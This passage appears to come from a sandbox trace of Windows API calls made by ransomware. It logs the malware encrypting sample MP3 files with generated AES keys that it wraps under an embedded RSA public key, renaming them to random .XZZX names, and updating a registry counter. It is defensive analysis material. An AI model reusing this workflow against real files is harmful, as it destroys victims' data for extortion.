lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0143.169] SetErrorMode (uMode=0x1) returned 0x1 [0143.169] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0143.169] OutputDebugStringW (lpOutputString="end") [0143.169] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0143.169] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0143.169] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x4379508) returned 1 [0143.170] CryptImportPublicKeyInfo (in: hCryptProv=0x4379508, dwCertEncodingType=0x1, pInfo=0x3cf2890*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf28c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf28c8*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3d119d8) returned 1 [0143.170] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0143.170] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0143.171] CryptEncrypt (in: hKey=0x3d119d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0143.171] CryptEncrypt (in: hKey=0x3d119d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4379590*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4379590*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0143.171] OutputDebugStringW (lpOutputString="Ȇ") [0143.171] WriteFile (in: hFile=0x88c, lpBuffer=0x4379590*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e42c, lpOverlapped=0x0 | out: lpBuffer=0x4379590*, lpNumberOfBytesWritten=0x420e42c*=0x80, lpOverlapped=0x0) returned 1 [0143.171] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0143.171] WriteFile (in: hFile=0x88c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e42c*=0x5, lpOverlapped=0x0) returned 1 [0143.171] CloseHandle (hObject=0x88c) returned 1 [0143.572] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.573] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.573] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\1758A0BD1A6F8CE6B3A600C11E90712E.XZZX" (normalized: "c:\\users\\public\\music\\sample music\\1758a0bd1a6f8ce6b3a600c11e90712e.xzzx"), dwFlags=0x1) returned 1 [0143.574] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0143.574] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0143.574] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x88c) returned 0x0 [0143.574] RegQueryValueExW (in: hKey=0x88c, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xcb, lpcbData=0x420dfdc*=0x4) returned 0x0 [0143.574] RegCloseKey (hKey=0x88c) returned 0x0 [0143.574] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x88c) returned 0x0 [0143.574] RegSetValueExW (in: hKey=0x88c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xcc, cbData=0x4 | out: lpData=0x420dfec*=0xcc) returned 0x0 [0143.575] RegCloseKey (hKey=0x88c) returned 0x0 Thread: id = 509 os_tid = 0xb54 [0142.701] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0142.701] lstrcpyW (in: lpString1=0x434f460, lpString2="Maid with the Flaxen Hair.mp3" | out: lpString1="Maid with the Flaxen Hair.mp3") returned="Maid with the Flaxen Hair.mp3" [0142.701] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0142.701] SetErrorMode (uMode=0x1) returned 0x1 [0142.701] lstrcpyW (in: lpString1=0x434f860, lpString2="Maid with the Flaxen Hair.mp3" | out: lpString1="Maid with the Flaxen Hair.mp3") returned="Maid with the Flaxen Hair.mp3" [0142.701] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x59ecacae, Data2=0xb4d9, Data3=0x42b3, Data4=([0]=0x8b, [1]=0xf6, [2]=0xb9, [3]=0x2f, [4]=0x30, [5]=0x37, [6]=0x27, [7]=0x19))) returned 0x0 [0142.701] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0142.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0142.701] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\A308B77E2F1E65BB59ECACAE33534A03.XZZX") returned 76 [0142.701] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch="XZZX") returned 0x0 [0142.701] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", dwFileAttributes=0x20) returned 1 [0142.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x894 [0142.702] CreateFileMappingW (hFile=0x894, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x898 [0142.702] MapViewOfFile (hFileMappingObject=0x898, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2dc6c0) returned 0x4840000 [0142.703] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0142.703] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0142.704] SetErrorMode (uMode=0x1) returned 0x1 [0142.704] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0142.704] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43793f8) returned 1 [0142.707] CryptGenKey (in: hProv=0x43793f8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d119d8) returned 1 [0142.843] CryptExportKey (in: hKey=0x3d119d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e420 | out: pbData=0x0*, pdwDataLen=0x434e420*=0x94) returned 1 [0142.843] CryptExportKey (in: hKey=0x3d119d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e420 | out: pbData=0x4350000*, pdwDataLen=0x434e420*=0x94) returned 1 [0142.843] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0142.843] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0142.843] CryptDestroyKey (hKey=0x3d119d8) returned 1 [0142.843] CryptReleaseContext (hProv=0x43793f8, dwFlags=0x0) returned 1 [0143.414] UnmapViewOfFile (lpBaseAddress=0x4840000) returned 1 [0143.436] CloseHandle (hObject=0x898) returned 1 [0143.436] SetFilePointer (in: hFile=0x894, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3ec5d2 [0143.436] WriteFile (in: hFile=0x894, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e42c*=0x5, lpOverlapped=0x0) returned 1 [0143.562] SetFilePointer (in: hFile=0x894, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3ec5d7 [0143.562] WriteFile (in: hFile=0x894, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x434e42c, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e42c*=0x3a, lpOverlapped=0x0) returned 1 [0143.562] SetFilePointer (in: hFile=0x894, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3ec611 [0143.562] WriteFile (in: hFile=0x894, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e42c*=0x5, lpOverlapped=0x0) returned 1 [0143.562] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0143.562] SetErrorMode (uMode=0x1) returned 0x1 [0143.562] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0143.562] OutputDebugStringW (lpOutputString="end") [0143.563] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0143.563] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0143.563] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x4379618) returned 1 [0143.563] CryptImportPublicKeyInfo (in: hCryptProv=0x4379618, dwCertEncodingType=0x1, pInfo=0x3cf2960*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2990*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2998*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3d11a98) returned 1 [0143.563] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0143.564] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0143.564] CryptEncrypt (in: hKey=0x3d11a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0143.564] CryptEncrypt (in: hKey=0x3d11a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43796a0*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43796a0*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0143.565] OutputDebugStringW (lpOutputString="Ȇ") [0143.565] WriteFile (in: hFile=0x894, lpBuffer=0x43796a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e42c, lpOverlapped=0x0 | out: lpBuffer=0x43796a0*, lpNumberOfBytesWritten=0x434e42c*=0x80, lpOverlapped=0x0) returned 1 [0143.565] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0143.565] WriteFile (in: hFile=0x894, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e42c*=0x5, lpOverlapped=0x0) returned 1 [0143.565] CloseHandle (hObject=0x894) returned 1 [0143.694] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.694] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.694] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\A308B77E2F1E65BB59ECACAE33534A03.XZZX" (normalized: "c:\\users\\public\\music\\sample music\\a308b77e2f1e65bb59ecacae33534a03.xzzx"), dwFlags=0x1) returned 1 [0143.695] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0143.695] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0143.695] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x894) returned 0x0 [0143.696] RegQueryValueExW (in: hKey=0x894, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xcd, lpcbData=0x434dfdc*=0x4) returned 0x0 [0143.696] RegCloseKey (hKey=0x894) returned 0x0 [0143.696] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x894) returned 0x0 [0143.696] RegSetValueExW (in: hKey=0x894, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xce, cbData=0x4 | out: lpData=0x434dfec*=0xce) returned 0x0 [0143.696] RegCloseKey (hKey=0x894) returned 0x0 Thread: id = 510 os_tid = 0xb58 [0142.858] lstrcpyA (in: lpString1=0x4c5fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0142.858] lstrcpyW (in: lpString1=0x4c5f460, lpString2="Sleep Away.mp3" | out: lpString1="Sleep Away.mp3") returned="Sleep Away.mp3" [0142.858] lstrcpyW (in: lpString1=0x4c5e860, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0142.858] SetErrorMode (uMode=0x1) returned 0x1 [0142.858] lstrcpyW (in: lpString1=0x4c5f860, lpString2="Sleep Away.mp3" | out: lpString1="Sleep Away.mp3") returned="Sleep Away.mp3" [0142.858] CoCreateGuid (in: pguid=0x4c5e440 | out: pguid=0x4c5e440*(Data1=0xe323002b, Data2=0xfc90, Data3=0x4103, Data4=([0]=0x95, [1]=0x35, [2]=0x2b, [3]=0x64, [4]=0x12, [5]=0x2f, [6]=0xf3, [7]=0xf5))) returned 0x0 [0142.858] wsprintfW (in: param_1=0x4c5ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0142.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x4c5fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0142.858] wsprintfW (in: param_1=0x4c5e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\37DA6C30402385B0E323002B44E969F8.XZZX") returned 76 [0142.858] StrStrW (lpFirst="Sleep Away.mp3", lpSrch="XZZX") returned 0x0 [0142.858] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", dwFileAttributes=0x20) returned 1 [0142.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8a8 [0142.859] CreateFileMappingW (hFile=0x8a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x8ac [0142.859] MapViewOfFile (hFileMappingObject=0x8ac, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2dc6c0) returned 0x4c60000 [0142.860] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4f40000 [0142.860] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4f50000 [0142.860] SetErrorMode (uMode=0x1) returned 0x1 [0142.860] lstrcpyW (in: lpString1=0x4c5e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0142.860] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43793f8) returned 1 [0142.862] CryptGenKey (in: hProv=0x43793f8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11998) returned 1 [0143.376] CryptExportKey (in: hKey=0x3d11998, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x4c5e420 | out: pbData=0x0*, pdwDataLen=0x4c5e420*=0x94) returned 1 [0143.376] CryptExportKey (in: hKey=0x3d11998, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4f50000, pdwDataLen=0x4c5e420 | out: pbData=0x4f50000*, pdwDataLen=0x4c5e420*=0x94) returned 1 [0143.376] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0143.377] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0143.377] CryptDestroyKey (hKey=0x3d11998) returned 1 [0143.377] CryptReleaseContext (hProv=0x4379480, dwFlags=0x0) returned 0 [0147.001] UnmapViewOfFile (lpBaseAddress=0x4c60000) returned 1 [0147.017] CloseHandle (hObject=0x8ac) returned 1 [0147.017] SetFilePointer (in: hFile=0x8a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x49e459 [0147.017] WriteFile (in: hFile=0x8a8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4c5e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4c5e42c*=0x5, lpOverlapped=0x0) returned 1 [0147.019] SetFilePointer (in: hFile=0x8a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x49e45e [0147.019] WriteFile (in: hFile=0x8a8, lpBuffer=0x4c5f860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x4c5e42c, lpOverlapped=0x0 | out: lpBuffer=0x4c5f860*, lpNumberOfBytesWritten=0x4c5e42c*=0x1c, lpOverlapped=0x0) returned 1 [0147.019] SetFilePointer (in: hFile=0x8a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x49e47a [0147.019] WriteFile (in: hFile=0x8a8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4c5e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4c5e42c*=0x5, lpOverlapped=0x0) returned 1 [0147.019] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0147.019] SetErrorMode (uMode=0x1) returned 0x1 [0147.019] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0147.019] OutputDebugStringW (lpOutputString="end") [0147.019] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`ÕÅ\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x4c5dbf4, pcbBinary=0x4c5d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x4c5dbf4, pcbBinary=0x4c5d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0147.019] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x4c5dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x4c5d3dc, pcbStructInfo=0x4c5d3d8 | out: pvStructInfo=0x4c5d3dc, 